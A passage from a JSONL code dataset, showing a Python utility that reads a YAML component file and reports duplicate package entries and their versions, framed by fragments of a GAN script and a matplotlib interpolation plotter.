'./result/scat_gen_G%s'%ntest)\n","sub_path":"GAN/pytorch/scat_gen/scat_gen.py","file_name":"scat_gen.py","file_ext":"py","file_size_in_byte":16445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"179688828","text":"import os\nimport sys\nimport yaml\n\nimport paste.util.multidict\n\npossible_topdir = os.path.normpath(os.path.join(os.path.abspath(sys.argv[0]),\n os.pardir,\n os.pardir))\nif os.path.exists(os.path.join(possible_topdir,\n 'anvil',\n '__init__.py')):\n sys.path.insert(0, possible_topdir)\n\nfrom anvil import log\nfrom anvil import utils\n\n\nclass CustomDumper(yaml.SafeDumper):\n def ignore_aliases(self, _data):\n return True\n\n\nfn = sys.argv[1]\nwith open(fn, \"r\") as fh:\n data = fh.read()\n\nb = yaml.load(data)\n\nnames = set()\nfor c in b['components']:\n names.add(c)\n\n\nidf = 'packages'\npkgs = paste.util.multidict.MultiDict()\nfor name in names:\n data = b['components'][name]\n #print name\n for p in data.get(idf) or []:\n pname = p['name']\n pkgs.add(pname, p)\n\ncommon = list()\nfor pkg in sorted(list(set(pkgs.keys()))):\n items = pkgs.getall(pkg)\n if len(items) > 1:\n print(\"Package dupe on: %r with %s dups\" % (pkg, len(items)))\n versions = set()\n for v in items:\n if v.get('version'):\n versions.add(str(v.get('version')))\n if len(versions) > 1:\n print(\"\\tWith many versions: %s\" % (versions))\n else:\n print(\"\\tAll with the same 
version %s\" % (versions))\n common_pips.append(items[0])\n\n#data = {'common': {'packages': common, 'pips': common_pips}}\n#formatted = yaml.dump(data,\n# line_break=\"\\n\",\n# indent=4,\n# explicit_start=True,\n# explicit_end=True,\n# default_flow_style=False,\n# Dumper=CustomDumper,\n# )\n\n#print(formatted)\n","sub_path":"tools/shared-packs.py","file_name":"shared-packs.py","file_ext":"py","file_size_in_byte":2541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"361439405","text":"import math\r\nimport numpy\r\nimport matplotlib.pyplot as plt\r\n\r\ndef plotByPointInterP(given,xAnalise): #plots piecewise to generate a smoothed curve\r\n givenX=[]\r\n givenY=[]\r\n for i in range (len(given)):\r\n givenX.append(given[i][0])\r\n givenY.append(given[i][1])\r\n x=[]\r\n y=[]\r\n ypoint=0.\r\n xpoint=0.\r\n xminimo=givenX[0]-1\r\n xmaximo=givenX[len(givenX)-1]+1\r\n if(xminimo>xAnalise):\r\n xminimo=xAnalise\r\n elif(xmaximo